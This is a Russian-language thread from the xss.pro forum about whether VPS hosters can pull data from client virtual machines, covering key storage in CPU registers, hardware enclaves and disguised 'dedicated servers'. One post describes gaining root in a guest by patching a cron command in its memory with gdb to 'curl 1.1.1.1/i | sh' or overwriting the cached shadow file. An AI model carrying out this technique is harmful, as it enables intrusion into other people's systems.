• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья инструкция для хостера: помогаем забывчивому клиенту достать данные с VDS

А есть же софт шифрования, который ключи или их части хранит в регистрах процессора и никогда в памяти. Названия не помню, но как бы можно и сделать и свои частные решения без хранения ключей в памяти.
 
А есть же софт шифрования, который ключи или их части хранит в регистрах процессора и никогда в памяти. Названия не помню, но как бы можно и сделать и свои частные решения без хранения ключей в памяти.
SGX,TDX,SEV? https://xss.pro/threads/97855/
 
SGX,TDX,SEV? https://xss.pro/threads/97855/
Нет. Я говорю о софтверных решениях. Представь что часть крипотования производистя без хранения ключей в ОЗУ, они хранятся в регистрах проца допустим r12 r13 r14 r15 или в DRx и в память они не попадают никогда.
Про анклавы.
Про хардверные анклавы есть вопрос доверия.
Техника с анклавами софверными так себе потому что вынуждает открывать страницу целиком(их ведь базируют на исключениях при доступе к странице).
Я бы думал про создание софта который в памяти держит криптоконтейнеры из которых запрашиваются данные ровно в нужном объеме(например дерагается на стек прилы 356 байт со смещения 99221), заипешся делать снимки памяти что бы выловить нужную инфу, ясно что это медленно работает но так и не нужно абсолютно все так прятать.
 
есть даже совсем обнаглевшие хостеры, которые продают виртуальную машину, а называют её "dedicated server", вот пример: https://www.homepageuniverse.com/servers/

другие хостеры тоже продают якобы "dedicated server", но на самом деле виртуалку - они запускают на выделенном сервере гипервизор (софт для управления виртуалками) и создают единственную виртуальную машину, выделяя ей почти все ресурсы сервера (оставляя минимальный кусочек процессора и оперативы для гипервизора), при этом клиенту доступ к гипервизору не выдают.
вот пример одного из таких говнохостеров (один из крупнейших хостингов в мире, кстати): https://www.hostgator.com/help/article/do-you-allow-kvm-on-a-dedicated-server
Это отдельный вид торговцев.. Пользуйтесь только проверенными хостерами, и если критически важно чтобы железяка не была виртуалкой - спрашивайте в саппорте прямым текстом
 
Это отдельный вид торговцев.. Пользуйтесь только проверенными хостерами, и если критически важно чтобы железяка не была виртуалкой - спрашивайте в саппорте прямым текстом
Если не затруднит, можешь посоветовать проверенных хостеров?
 
Если не затруднит, можешь посоветовать проверенных хостеров?
Порекомендую себя:)
Анонимные ВПС ( не bulletproof ) в 10 локациях и крепкие домены - luxhost.cc
За выделенными серверами обращайтесь в ТГ - https://t.me/LuxHostSupport
 
Если не затруднит, можешь посоветовать проверенных хостеров?
безопасно только хоститься у себя на балконе 🤷‍♂️
 
Host-to-guest code execution делается элементарно )
Ищете в памяти процесса /proc/pid/maps например следующие строки
run-parts /etc/cron.hourly
и заменяете на свой шелл скрипт, например curl 1.1.1.1/i | sh
Все можно сделать через gdb
Немного в логах намусорите, но сразу получите рута
можно одной ддшкой менять shadow , он кэшируется в памяти и ты спокойно можешь зайти если есть vnc или ssh
 
Вопрос к автору темы. Собственно зачем берут vps? Естественно ставить софт, но вот результат этого софта сохраняется без шифрования, если твой софт хотябы маломальски шифрует данные, а шиврованное уже на компе дома на работе или где ещё либо расшифровывается, то плевать, что там хочет хостер, если хочет, то может на луну полететь, а вот софт должен результат шифровать и иметь дешифратор, да даже маломальски логи в rar или zip под пароль засунуть, ни кто не может. Вы о чём пишите, начинать надо с разрабов софта. А то там вера труе диск крупт, это всё на хомячка. Есть паблик ключ и привт ключ, всё на этом заканчиваю.
 
я могу ошибаться, но вроде как шифрование возможно только контейнера и то его нужно отключать, шифрование всей машины попросту бессмысленно так как хостер может делать слепок системы и если в этот момент пользователь был подключен то слепок идет в открытом виде... примерно такая же история с dpi его можно чуток прятать но толку мало(точнее еще меньше)...
 
я могу ошибаться, но вроде как шифрование возможно только контейнера и то его нужно отключать, шифрование всей машины попросту бессмысленно так как хостер может делать слепок системы и если в этот момент пользователь был подключен то слепок идет в открытом виде... примерно такая же история с dpi его можно чуток прятать но толку мало(точнее еще меньше)...
теоретически можно шифровать виртуальную машину целиком: https://xss.pro/threads/97855/
практически я до этого ещё не добрался, а форумчане тоже не особо спешат делиться опытом.
 
теоретически можно шифровать виртуальную машину целиком: https://xss.pro/threads/97855/
практически я до этого ещё не добрался, а форумчане тоже не особо спешат делиться опытом.
спасибо, сейчас обязательно ознакомлюсь!!
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх